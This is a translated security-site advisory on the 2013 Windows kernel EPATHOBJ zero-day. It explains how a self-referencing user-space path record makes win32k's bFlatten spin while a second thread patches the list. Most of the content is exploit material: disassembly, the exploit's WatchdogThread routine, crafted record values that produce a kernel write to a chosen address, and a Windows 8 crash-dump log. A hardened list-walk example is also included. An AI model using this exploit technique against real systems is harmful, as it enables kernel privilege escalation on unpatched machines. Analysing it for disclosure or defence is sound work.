Windows kernel EPATHOBJ 0day exploit: vulnerability warning (myhack58)

Published: 2013-05-23T00:00:00
ID: MYHACK58:62201338894
Type: myhack58
Reporter: 佚名 (anonymous)
Modified: 2013-05-23T00:00:00

Description

This vulnerability was found by memory-pressure testing of PATHALLOC(). The first primitive: when a PATHRECORD's next pointer refers to a user-space PATHRECORD that points back to itself, EPATHOBJ::bFlatten() "spins" in an unbounded linked-list traversal.

For example:

PathRecord->next = PathRecord;

Although it spins, another thread can patch the list node that pprFlattenRec works on, because that node lives in user space.

First, create a "watchdog" thread that atomically patches the list. On its own the bug cannot be exploited, because pprFlattenRec exits early when its allocation (HeavyAllocPool) fails:

pprFlattenRec:
.text:BFA122B8 call newpathrec ; EPATHOBJ::newpathrec(_PATHRECORD *, ulong, ulong)
.text:BFA122BD cmp eax, 1      ; Check for failure
.text:BFA122C0 jz short continue
.text:BFA122C2 xor eax, eax    ; Exit early
.text:BFA122C4 jmp early_exit

So the list node is set up like this:

PathRecord->Next = PathRecord;
PathRecord->Flags = 0;

Then EPATHOBJ::bFlatten() spins:

BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
{
    /* ... */
    for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext ) {
        if ( ppr->flags & PD_BEZIER ) {
            ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
        }
    }
    /* ... */
}
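The loop above follows pprnext with no bound on the walk and no check on where the records live. As an added illustration (not win32k code and not part of this advisory), the C below models a hardened form of that loop: it refuses records outside the kernel-owned allocation and detects the self-referencing cycle the text describes. The PathRecord layout is trimmed to the fields the loop touches, the PD_BEZIERS value is a constructed stand-in, and the scenario functions build their lists inline.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#define PD_BEZIERS 0x10u   /* constructed stand-in; the real win32k value is not on the page */
typedef struct PathRecord {            /* only the fields the bFlatten() loop touches */
    struct PathRecord *pprnext, *pprprev;
    uint32_t flags;
} PathRecord;
typedef enum { WALK_OK, WALK_CYCLE, WALK_FOREIGN_NODE } WalkResult;
static bool in_pool(const PathRecord *p, uintptr_t lo, uintptr_t hi) {   /* wholly inside kernel-owned storage? */
    return (uintptr_t)p >= lo && (uintptr_t)p + sizeof *p <= hi;
}
/* Hardened form of the quoted loop: refuses records outside [pool, pool+len) instead of dereferencing
 * caller memory, and uses Floyd's tortoise-and-hare so a self-loop returns WALK_CYCLE instead of spinning. */
WalkResult flatten_checked(PathRecord *first, const void *pool, size_t len, int *visited) {
    uintptr_t lo = (uintptr_t)pool, hi = lo + len;
    PathRecord *slow = first, *fast = first;
    int n = 0;
    while (slow) {
        if (!in_pool(slow, lo, hi)) return WALK_FOREIGN_NODE;
        if (slow->flags & PD_BEZIERS) { /* pprFlattenRec() would be called here */ }
        n++;
        slow = slow->pprnext;
        for (int i = 0; i < 2 && fast; i++) {          /* hare: two validated steps */
            if (!in_pool(fast, lo, hi)) return WALK_FOREIGN_NODE;
            fast = fast->pprnext;
        }
        if (fast && fast == slow) return WALK_CYCLE;
    }
    *visited = n;
    return WALK_OK;
}
/* Constructed scenarios: the static array models kernel-owned storage; 'foreign' models
 * a record the caller placed in its own memory. */
static PathRecord pool[3], foreign;
WalkResult walk_self_loop(void) {               /* the page's PathRecord->next = PathRecord */
    int n; pool[0] = (PathRecord){ &pool[0], NULL, 0 };
    return flatten_checked(&pool[0], pool, sizeof pool, &n);
}
int walk_proper_list(void) {                    /* three in-pool records, NULL-terminated */
    int n = 0; pool[0] = (PathRecord){ &pool[1], NULL, PD_BEZIERS };
    pool[1] = (PathRecord){ &pool[2], &pool[0], 0 };
    pool[2] = (PathRecord){ NULL, &pool[1], 0 };
    return flatten_checked(&pool[0], pool, sizeof pool, &n) == WALK_OK ? n : -1;
}
WalkResult walk_into_caller_memory(void) {      /* second record lives outside the pool */
    int n; pool[0] = (PathRecord){ &foreign, NULL, 0 };
    foreign = (PathRecord){ NULL, &pool[0], 0 };
    return flatten_checked(&pool[0], pool, sizeof pool, &n);
}
```

The hare is validated before each dereference, so a record outside the pool is refused even when it is only reached by the fast pointer.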

Let the first thread spin; the other thread then repairs the list (possible because it lives in user space), which triggers the vulnerability in EPATHOBJ::bFlatten() from the first pprFlattenRec code block:

if ( pprNew->pprPrev )
    pprNew->pprPrev->pprnext = pprNew;

writing 0xCCCCCCCC:

DWORD WINAPI WatchdogThread(LPVOID Parameter)
{
    // This routine waits on a mutex object with a timeout, then repairs the
    // damaged list so that it points at the vulnerability.
    LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex () %p", GetCurrentThreadId(), Mutex);

    if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
        // The main thread is stuck in FlattenPath(), because the kernel is
        // spinning in EPATHOBJ::bFlatten(); it can be cleaned up, and then
        // the list is patched to trigger our exploit.
        while (NumRegion--)
            DeleteObject(Regions[NumRegion]);

        LogMessage(L_ERROR, "InterlockedExchange(%p, %p);",
                   &PathRecord->next, &ExploitRecord);

        InterlockedExchangePointer(&PathRecord->next, &ExploitRecord);
    } else {
        LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
    }
    return 0;
}

PathRecord->next  = PathRecord;
PathRecord->prev  = (PVOID)(0x42424242);
PathRecord->flags = 0;
ExploitRecord.next  = NULL;
ExploitRecord.prev  = 0xCCCCCCCC;
ExploitRecord.flags = PD_BEZIERS;

On Windows 8 the output is as follows:

kd> g

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 50, {cccccccc, 1, 8f18972e, 2}

WARNING: Unable to verify checksum for ComplexPath.exe
ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe
Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 )

Followup: MachineOwner

nt!RtlpBreakWithStatusInstruction:
810f46f4 cc              int     3
kd> kv
ChildEBP RetAddr  Args to Child
a03ab494 8111c87d 00000003 c17b60e1 cccccccc nt!RtlpBreakWithStatusInstruction (FPO: [1,0,0])
a03ab4e4 8111c119 00000003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: [Non-Fpo])
a03ab8b8 810f30ba 00000050 cccccccc 00000001 nt!KeBugCheck2+0x655 (FPO: [6,239,4])
a03ab8dc 810f2ff1 00000050 cccccccc 00000001 nt!KiBugCheck2+0xc6
a03ab8fc 811a2816 00000050 cccccccc 00000001 nt!KeBugCheckEx+0x19
a03ab94c 810896cf 00000001 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string'+0x31868
a03aba14 8116c4e4 00000001 cccccccc 00000000 nt!MmAccessFault+0x42d (FPO: [4,37,4])
a03aba14 8f18972e 00000001 cccccccc 00000000 nt!KiTrap0E+0xdc (FPO: [0,0] TrapFrame @ a03aba2c)
a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k!EPATHOBJ::pprFlattenRec+0x82 (FPO: [Non-Fpo])
a03abbb8 8f248f79 1c010779 0016fd04 8f248f18 win32k!EPATHOBJ::bFlatten+0x1f (FPO: [0,1,0])
a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k!NtGdiFlattenPath+0x61 (FPO: [1,15,4])
a03abc08 776d7174 1c010779 0016fd18 776d7174 nt!KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame @ a03abc14)
0016fcf4 76b1552b 0124147f 1c010779 00000040 ntdll!KiFastSystemCallRet (FPO: [0,0,0])
0016fcf8 0124147f 1c010779 00000040 00000000 GDI32!NtGdiFlattenPath+0xa (FPO: [1,0,0])
WARNING: Stack unwind information not available. Following frames may be wrong.
0016fd18 01241ade 00000001 00202b50 00202ec8 ComplexPath+0x147f
0016fd60 76ee1866 7f0de000 0016fdb0 77716911 ComplexPath+0x1ade
0016fd6c 77716911 7f0de000 bc1d7832 00000000 KERNEL32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
0016fdb0 777168bd ffffffff 7778560a 00000000 ntdll!__RtlUserThreadStart+0x4a (FPO: [SEH])
0016fdc0 00000000 01241b5b 7f0de000 00000000 ntdll!_RtlUserThreadStart+0x1c (FPO: [Non-Fpo])
kd> .trap a03aba2c
ErrCode = 00000002
eax=cccccccc ebx=80206014 ecx=80206008 edx=85ae1224 esi=0124eba0 edi=a03abbd8
eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0         nv up ei ng nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
win32k!EPATHOBJ::pprFlattenRec+0x82:
8f18972e 8918            mov     dword ptr [eax],ebx  ds:0023:cccccccc=????????
kd> vertarget
Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 9200.16581.x86fre.win8_gdr.130410-1505
Machine Name:
Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48
Debug session time: Mon May 20 14:17:20.259 2013 (UTC - 7:00)
System Uptime: 0 days 0:02:30.432
kd> .bugcheck
Bugcheck code 00000050
Arguments cccccccc 00000001 8f18972e 00000002
